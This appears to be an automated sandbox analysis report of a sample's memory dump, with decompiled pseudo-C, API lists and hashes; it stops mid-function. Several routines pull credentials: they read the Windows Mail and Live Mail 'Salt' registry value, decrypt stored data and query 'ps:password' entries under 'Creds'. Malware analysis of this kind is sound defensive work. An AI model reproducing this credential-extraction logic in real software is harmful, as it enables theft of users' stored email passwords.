                                                                        					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                        					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                        						sprintf( &_v264, " color=\"#%s\"", E0040F071(_t33,  &_v520));
                                                                        						strcat(_t60,  &_v264);
                                                                        					}
                                                                        					strcat(_t60, ">");
                                                                        				}
                                                                        				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                        					strcat(_t60, "<b>");
                                                                        				}
                                                                        				strcat(_t60, _a8);
                                                                        				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                        					strcat(_t60, "</b>");
                                                                        				}
                                                                        				if(_v8 != 0) {
                                                                        					strcat(_t60, "</font>");
                                                                        				}
                                                                        				return _t60;
                                                                        			}














                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040F147
                                                                        • memset.MSVCRT ref: 0040F15B
                                                                        • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F188
                                                                        • sprintf.MSVCRT ref: 0040F1A3
                                                                        • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F1B0
                                                                        • sprintf.MSVCRT ref: 0040F1DA
                                                                        • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F1E7
                                                                        • strcat.MSVCRT(?,00413DF4,?,?,?,?,?), ref: 0040F1F5
                                                                        • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F207
                                                                        • strcat.MSVCRT(?,00409631,?,?,?,?,?), ref: 0040F212
                                                                        • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F224
                                                                        • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F236
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcat$memsetsprintf$strcpy
                                                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                        • API String ID: 1662040868-1996832678
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E00409482(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                        				signed int _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				void _v79;
                                                                        				char _v80;
                                                                        				void _v131;
                                                                        				char _v132;
                                                                        				void _v183;
                                                                        				char _v184;
                                                                        				char _v236;
                                                                        				void _v491;
                                                                        				char _v492;
                                                                        				void* __edi;
                                                                        				void* _t83;
                                                                        				void* _t100;
                                                                        				char* _t103;
                                                                        				intOrPtr* _t120;
                                                                        				signed int _t121;
                                                                        				char _t139;
                                                                        				signed int _t152;
                                                                        				signed int _t153;
                                                                        				signed int _t156;
                                                                        				intOrPtr* _t157;
                                                                        				void* _t158;
                                                                        				void* _t160;
                                                                        
                                                                        				_t120 = __ebx;
                                                                        				_v492 = 0;
                                                                        				memset( &_v491, 0, 0xfe);
                                                                        				_t121 = 0xc;
                                                                        				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
                                                                        				asm("movsb");
                                                                        				_t156 = 0;
                                                                        				_v132 = 0;
                                                                        				memset( &_v131, 0, 0x31);
                                                                        				_v184 = 0;
                                                                        				memset( &_v183, 0, 0x31);
                                                                        				_v80 = 0;
                                                                        				memset( &_v79, 0, 0x31);
                                                                        				_t160 = _t158 + 0x3c;
                                                                        				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
                                                                        				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
                                                                        				if(_t83 != 0xffffffff) {
                                                                        					sprintf( &_v132, " bgcolor=\"%s\"", E0040F071(_t83,  &_v492));
                                                                        					_t160 = _t160 + 0x14;
                                                                        				}
                                                                        				E00405EFD(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                        				_v8 = _t156;
                                                                        				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
                                                                        					while(1) {
                                                                        						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
                                                                        						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
                                                                        							strcpy( &_v80, " nowrap");
                                                                        						}
                                                                        						_v28 = _v28 | 0xffffffff;
                                                                        						_v24 = _v24 | 0xffffffff;
                                                                        						_v20 = _v20 | 0xffffffff;
                                                                        						_v16 = _t156;
                                                                        						_t157 = _a8;
                                                                        						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
                                                                        						E0040F071(_v28,  &_v184);
                                                                        						E0040F09D( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
                                                                        						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
                                                                        						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
                                                                        						_t153 = _t152 * 0x14;
                                                                        						if(_t100 == 0xffffffff) {
                                                                        							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
                                                                        						} else {
                                                                        							_push( *(_t153 + _v12 + 0x10));
                                                                        							_push(E0040F071(_t100,  &_v492));
                                                                        							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
                                                                        							_t160 = _t160 + 0x10;
                                                                        						}
                                                                        						_t103 =  *(_t120 + 0x50);
                                                                        						_t139 =  *_t103;
                                                                        						if(_t139 == 0 || _t139 == 0x20) {
                                                                        							strcat(_t103, "&nbsp;");
                                                                        						}
                                                                        						E0040F126( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
                                                                        						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
                                                                        						E00405EFD(_a4,  *(_t120 + 0x4c));
                                                                        						_t160 = _t160 + 0x2c;
                                                                        						_v8 = _v8 + 1;
                                                                        						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
                                                                        							goto L14;
                                                                        						}
                                                                        						_t156 = 0;
                                                                        					}
                                                                        				}
                                                                        				L14:
                                                                        				E00405EFD(_a4, "</table><p>");
                                                                        				return E00405EFD(_a4, 0x412b1c);
                                                                        			}
































                                                                        APIs
                                                                        • memset.MSVCRT ref: 004094A2
                                                                        • memset.MSVCRT ref: 004094C5
                                                                        • memset.MSVCRT ref: 004094DB
                                                                        • memset.MSVCRT ref: 004094EB
                                                                        • sprintf.MSVCRT ref: 0040951F
                                                                        • strcpy.MSVCRT(00000000, nowrap), ref: 00409566
                                                                        • sprintf.MSVCRT ref: 004095ED
                                                                        • strcat.MSVCRT(?,&nbsp;), ref: 0040961C
                                                                          • Part of subcall function 0040F071: sprintf.MSVCRT ref: 0040F090
                                                                        • strcpy.MSVCRT(?,?), ref: 00409601
                                                                        • sprintf.MSVCRT ref: 00409650
                                                                          • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                          • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                                                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                        • API String ID: 2822972341-601624466
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E00409EC4(void* __eax) {
                                                                        				void* _v36;
                                                                        				long _v40;
                                                                        				void* _v44;
                                                                        				void* _v56;
                                                                        				long _t21;
                                                                        				void* _t24;
                                                                        				long _t26;
                                                                        				long _t34;
                                                                        				long _t37;
                                                                        				intOrPtr* _t40;
                                                                        				void* _t42;
                                                                        				intOrPtr* _t44;
                                                                        				void* _t47;
                                                                        
                                                                        				_t40 = ImageList_Create;
                                                                        				_t47 = __eax;
                                                                        				_t44 = __imp__ImageList_SetImageCount;
                                                                        				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
                                                                        					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                        					 *(_t47 + 0x18c) = _t37;
                                                                        					 *_t44(_t37, 1);
                                                                        					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
                                                                        				}
                                                                        				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
                                                                        					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
                                                                        					 *(_t47 + 0x190) = _t34;
                                                                        					 *_t44(_t34, 1);
                                                                        					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
                                                                        				}
                                                                        				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
                                                                        				 *(_t47 + 0x188) = _t21;
                                                                        				 *_t44(_t21, 2);
                                                                        				_v36 = LoadImageA( *0x416b94, 0x85, 0, 0x10, 0x10, 0x1000);
                                                                        				_t24 = LoadImageA( *0x416b94, 0x86, 0, 0x10, 0x10, 0x1000);
                                                                        				_t42 = _t24;
                                                                        				 *_t44( *(_t47 + 0x188), 0);
                                                                        				_t26 = GetSysColor(0xf);
                                                                        				_v40 = _t26;
                                                                        				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
                                                                        				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
                                                                        				DeleteObject(_v56);
                                                                        				DeleteObject(_t42);
                                                                        				return SendMessageA(E004049E7( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
                                                                        			}

















                                                                        APIs
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409EF1
                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409EFC
                                                                        • SendMessageA.USER32(?,00001003,00000001,?), ref: 00409F11
                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409F26
                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409F31
                                                                        • SendMessageA.USER32(?,00001003,00000000,?), ref: 00409F46
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409F52
                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409F5D
                                                                        • LoadImageA.USER32 ref: 00409F7B
                                                                        • LoadImageA.USER32 ref: 00409F97
                                                                        • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409FA3
                                                                        • GetSysColor.USER32(0000000F), ref: 00409FA7
                                                                        • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00409FC2
                                                                        • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 00409FCF
                                                                        • DeleteObject.GDI32(?), ref: 00409FDB
                                                                        • DeleteObject.GDI32(00000000), ref: 00409FDE
                                                                        • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 00409FFC
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                                                                        • String ID:
                                                                        • API String ID: 3411798969-0
                                                                        • Opcode ID: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                        • Instruction ID: 9f66d34d320d782a5b10da91aa20dc2822d11362667953dcc3c6c241c584b6d3
                                                                        • Opcode Fuzzy Hash: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                        • Instruction Fuzzy Hash: E23150716803087FFA316B70DC47FD67B95EB48B00F114829F395AA1E1CAF279909B18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E0040B841(signed int __eax, void* __esi) {
                                                                        				void* _t5;
                                                                        				void* _t6;
                                                                        				void* _t7;
                                                                        				void* _t8;
                                                                        				void* _t9;
                                                                        				void* _t10;
                                                                        
                                                                        				_push("/shtml");
                                                                        				L004115B2();
                                                                        				if(__eax != 0) {
                                                                        					_push("/sverhtml");
                                                                        					L004115B2();
                                                                        					if(__eax != 0) {
                                                                        						_push("/sxml");
                                                                        						L004115B2();
                                                                        						if(__eax != 0) {
                                                                        							_push("/stab");
                                                                        							L004115B2();
                                                                        							if(__eax != 0) {
                                                                        								_push("/scomma");
                                                                        								L004115B2();
                                                                        								if(__eax != 0) {
                                                                        									_push("/stabular");
                                                                        									L004115B2();
                                                                        									if(__eax != 0) {
                                                                        										_push("/skeepass");
                                                                        										L004115C4();
                                                                        										asm("sbb eax, eax");
                                                                        										return ( ~__eax & 0xfffffff8) + 8;
                                                                        									} else {
                                                                        										_t5 = 3;
                                                                        										return _t5;
                                                                        									}
                                                                        								} else {
                                                                        									_t6 = 7;
                                                                        									return _t6;
                                                                        								}
                                                                        							} else {
                                                                        								_t7 = 2;
                                                                        								return _t7;
                                                                        							}
                                                                        						} else {
                                                                        							_t8 = 6;
                                                                        							return _t8;
                                                                        						}
                                                                        					} else {
                                                                        						_t9 = 5;
                                                                        						return _t9;
                                                                        					}
                                                                        				} else {
                                                                        					_t10 = 4;
                                                                        					return _t10;
                                                                        				}
                                                                        			}










                                                                        APIs
                                                                        • _stricmp.MSVCRT(/shtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B847
                                                                        • _stricmp.MSVCRT(/sverhtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B85C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _stricmp
                                                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                        • API String ID: 2884411883-1959339147
                                                                        • Opcode ID: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                        • Instruction ID: 4e6abd9895fa0fe71fc14c80fe1cf8958250247b4a97c707517fcc1bdd8d2f83
                                                                        • Opcode Fuzzy Hash: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                        • Instruction Fuzzy Hash: AD011A7328931038F82925662C17FC30A8ACBD1BBBF30856BF606E41E5EF5DA5C0506D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E0040F243(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
                                                                        				void _v259;
                                                                        				char _v260;
                                                                        				void _v515;
                                                                        				char _v516;
                                                                        				void _v771;
                                                                        				char _v772;
                                                                        				void _v1027;
                                                                        				char _v1028;
                                                                        				char _v1284;
                                                                        				char _v2308;
                                                                        				char _t47;
                                                                        				intOrPtr* _t50;
                                                                        				void* _t57;
                                                                        				intOrPtr* _t73;
                                                                        				void* _t76;
                                                                        				void* _t77;
                                                                        				void* _t78;
                                                                        				void* _t79;
                                                                        
                                                                        				_v1028 = 0;
                                                                        				memset( &_v1027, 0, 0xfe);
                                                                        				_v772 = 0;
                                                                        				memset( &_v771, 0, 0xfe);
                                                                        				_v516 = 0;
                                                                        				memset( &_v515, 0, 0xfe);
                                                                        				_t77 = _t76 + 0x24;
                                                                        				if(_a16 != 0xffffffff) {
                                                                        					sprintf( &_v1028, " bgcolor=\"%s\"", E0040F071(_a16,  &_v1284));
                                                                        					_t77 = _t77 + 0x14;
                                                                        				}
                                                                        				if(_a20 != 0xffffffff) {
                                                                        					sprintf( &_v772, "<font color=\"%s\">", E0040F071(_a20,  &_v1284));
                                                                        					strcpy( &_v516, "</font>");
                                                                        					_t77 = _t77 + 0x1c;
                                                                        				}
                                                                        				sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
                                                                        				E00405EFD(_a4,  &_v2308);
                                                                        				_t47 = _a12;
                                                                        				_t78 = _t77 + 0x14;
                                                                        				if(_t47 > 0) {
                                                                        					_t73 = _a8 + 4;
                                                                        					_a16 = _t47;
                                                                        					do {
                                                                        						_v260 = 0;
                                                                        						memset( &_v259, 0, 0xfe);
                                                                        						_t50 =  *_t73;
                                                                        						_t79 = _t78 + 0xc;
                                                                        						if( *_t50 == 0) {
                                                                        							_v260 = 0;
                                                                        						} else {
                                                                        							sprintf( &_v260, " width=\"%s\"", _t50);
                                                                        							_t79 = _t79 + 0xc;
                                                                        						}
                                                                        						sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
                                                                        						_t57 = E00405EFD(_a4,  &_v2308);
                                                                        						_t78 = _t79 + 0x20;
                                                                        						_t73 = _t73 + 8;
                                                                        						_t34 =  &_a16;
                                                                        						 *_t34 = _a16 - 1;
                                                                        					} while ( *_t34 != 0);
                                                                        					return _t57;
                                                                        				}
                                                                        				return _t47;
                                                                        			}






















                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: sprintf$memset$strcpy
                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                        • API String ID: 898937289-3842416460
                                                                        • Opcode ID: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                        • Instruction ID: 9a5c5c5b7b50b61a4e5f96e5236d764a10b70f2cfe31ee2b12760fde8c14bfcc
                                                                        • Opcode Fuzzy Hash: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                        • Instruction Fuzzy Hash: C3415FB284021D7ADF21EB55DC41FEB776CAF44344F0401FBBA09A2152E6389F988FA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040E0DA() {
                                                                        				void* _t1;
                                                                        				int _t2;
                                                                        				struct HINSTANCE__* _t4;
                                                                        
                                                                        				if( *0x417518 != 0) {
                                                                        					return _t1;
                                                                        				}
                                                                        				_t2 = LoadLibraryA("psapi.dll");
                                                                        				_t4 = _t2;
                                                                        				if(_t4 == 0) {
                                                                        					L10:
                                                                        					return _t2;
                                                                        				} else {
                                                                        					_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
                                                                        					 *0x416fec = _t2;
                                                                        					if(_t2 != 0) {
                                                                        						_t2 = GetProcAddress(_t4, "EnumProcessModules");
                                                                        						 *0x416fe4 = _t2;
                                                                        						if(_t2 != 0) {
                                                                        							_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
                                                                        							 *0x416fdc = _t2;
                                                                        							if(_t2 != 0) {
                                                                        								_t2 = GetProcAddress(_t4, "EnumProcesses");
                                                                        								 *0x41710c = _t2;
                                                                        								if(_t2 != 0) {
                                                                        									_t2 = GetProcAddress(_t4, "GetModuleInformation");
                                                                        									 *0x416fe8 = _t2;
                                                                        									if(_t2 != 0) {
                                                                        										 *0x417518 = 1;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					if( *0x417518 == 0) {
                                                                        						_t2 = FreeLibrary(_t4);
                                                                        					}
                                                                        					goto L10;
                                                                        				}
                                                                        			}







                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,0040DD12), ref: 0040E0ED
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E106
                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E117
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E128
                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E139
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E14A
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0040E16A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                        • API String ID: 2449869053-232097475
                                                                        • Opcode ID: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                        • Instruction ID: ee37d54ff12c00b719d991246764d0af3e5b6fb2a2d0f9e8910a6c9c4b0fdd5c
                                                                        • Opcode Fuzzy Hash: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                        • Instruction Fuzzy Hash: F0015E31740311EAC711EB266D40FE73EB85B48B91B11843BE544E52A4D778C5928A6C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E00410525(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				char _v6;
                                                                        				char _v7;
                                                                        				char _v8;
                                                                        				int _v12;
                                                                        				intOrPtr _v16;
                                                                        				void* _v20;
                                                                        				short* _v24;
                                                                        				unsigned int _v28;
                                                                        				char* _v32;
                                                                        				int _v36;
                                                                        				intOrPtr _v40;
                                                                        				signed int _v44;
                                                                        				void _v299;
                                                                        				char _v300;
                                                                        				void _v555;
                                                                        				char _v556;
                                                                        				char _v1080;
                                                                        				void* __esi;
                                                                        				int _t56;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t64;
                                                                        				char _t92;
                                                                        				char* _t93;
                                                                        				void* _t100;
                                                                        				signed int _t102;
                                                                        				signed int _t107;
                                                                        				intOrPtr _t108;
                                                                        				void* _t113;
                                                                        
                                                                        				_t113 = __eflags;
                                                                        				_t100 = __edx;
                                                                        				_t93 = __eax;
                                                                        				E004046D7( &_v1080);
                                                                        				if(E004047A0( &_v1080, _t113) != 0) {
                                                                        					_t56 = strlen(_t93);
                                                                        					asm("cdq");
                                                                        					_t107 = _t56 - _t100 >> 1;
                                                                        					_t2 = _t107 + 1; // 0x1
                                                                        					_t58 = _t2;
                                                                        					L004115D0();
                                                                        					_t102 = 0;
                                                                        					_t96 = _t58;
                                                                        					_v16 = _t58;
                                                                        					if(_t107 > 0) {
                                                                        						do {
                                                                        							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
                                                                        							_v7 = _t93[1 + _t102 * 2];
                                                                        							_v6 = 0;
                                                                        							_t92 = E00406512( &_v8);
                                                                        							_t96 = _v16;
                                                                        							 *((char*)(_t102 + _v16)) = _t92;
                                                                        							_t102 = _t102 + 1;
                                                                        						} while (_t102 < _t107);
                                                                        					}
                                                                        					_v556 = 0;
                                                                        					memset( &_v555, 0, 0xff);
                                                                        					_v12 = 0;
                                                                        					_v300 = 0;
                                                                        					memset( &_v299, 0, 0xfe);
                                                                        					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
                                                                        					if(_t64 != 1) {
                                                                        						__eflags = _t64 - 2;
                                                                        						if(_t64 == 2) {
                                                                        							_push("Software\\Microsoft\\Windows Live Mail");
                                                                        							goto L7;
                                                                        						}
                                                                        					} else {
                                                                        						_push("Software\\Microsoft\\Windows Mail");
                                                                        						L7:
                                                                        						strcpy( &_v300, ??);
                                                                        						_pop(_t96);
                                                                        					}
                                                                        					if(E0040EB3F(0x80000001,  &_v300,  &_v20) == 0) {
                                                                        						_v12 = 0xff;
                                                                        						E0040EBA3(_t96, _v20, "Salt",  &_v556,  &_v12);
                                                                        						RegCloseKey(_v20);
                                                                        					}
                                                                        					_v40 = _v16;
                                                                        					_v36 = _v12;
                                                                        					_v32 =  &_v556;
                                                                        					_v44 = _t107;
                                                                        					if(E00404811( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
                                                                        						_t108 = _a8;
                                                                        						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
                                                                        						(_t108 + 0x400)[_v28 >> 1] = 0;
                                                                        						LocalFree(_v24);
                                                                        					}
                                                                        					_push(_v16);
                                                                        					L004115D6();
                                                                        				}
                                                                        				return E004047F1( &_v1080);
                                                                        			}
































                                                                        APIs
                                                                          • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                          • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                          • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                        • strlen.MSVCRT ref: 0041054C
                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0041055C
                                                                        • memset.MSVCRT ref: 004105A8
                                                                        • memset.MSVCRT ref: 004105C5
                                                                        • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 004105F3
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00410637
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410688
                                                                        • LocalFree.KERNEL32(?), ref: 0041069D
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004106A6
                                                                          • Part of subcall function 00406512: strtoul.MSVCRT ref: 0040651A
                                                                        Strings
                                                                        • Software\Microsoft\Windows Mail, xrefs: 004105DB
                                                                        • Software\Microsoft\Windows Live Mail, xrefs: 004105E7
                                                                        • Salt, xrefs: 00410621
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                        • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                        • API String ID: 1673043434-2687544566
                                                                        • Opcode ID: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                                        • Instruction ID: 7afd7cd9a60bb03764dcbc3854d87102a14f95683297c5d7d0928fc071fa2b2b
                                                                        • Opcode Fuzzy Hash: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                                        • Instruction Fuzzy Hash: D14186B2C0011CAECB11DBA5DC81ADEBBBCAF48344F1041ABE645F3251DA349A95CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 56%
                                                                        			E0040D6FB(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
                                                                        				int _v8;
                                                                        				int _v12;
                                                                        				void* _v16;
                                                                        				short* _v20;
                                                                        				int _v24;
                                                                        				char* _v28;
                                                                        				char _v32;
                                                                        				intOrPtr _v36;
                                                                        				char _v40;
                                                                        				int _v44;
                                                                        				void _v299;
                                                                        				char _v300;
                                                                        				char _v556;
                                                                        				char _v812;
                                                                        				char _v4908;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				long _t46;
                                                                        				int* _t84;
                                                                        				char* _t85;
                                                                        
                                                                        				E004118A0(0x132c, __ecx);
                                                                        				_t84 = 0;
                                                                        				_t46 = RegOpenKeyExA(_a16, "Creds", 0, 0x20019,  &_a16);
                                                                        				if(_t46 != 0) {
                                                                        					return _t46;
                                                                        				}
                                                                        				_v300 = _t46;
                                                                        				memset( &_v299, 0, 0xff);
                                                                        				_push(0xff);
                                                                        				_push( &_v300);
                                                                        				_v8 = 0;
                                                                        				_push(0);
                                                                        				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {
                                                                        					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
                                                                        						_v12 = 0x1000;
                                                                        						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
                                                                        							_v32 = _v12;
                                                                        							_v28 =  &_v4908;
                                                                        							_v40 = _a12;
                                                                        							_v36 = _a8;
                                                                        							if(E00404811(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
                                                                        								_t85 =  &_v812;
                                                                        								_v812 = 0;
                                                                        								_v556 = 0;
                                                                        								E004060D0(0xff, _t85,  &_v300);
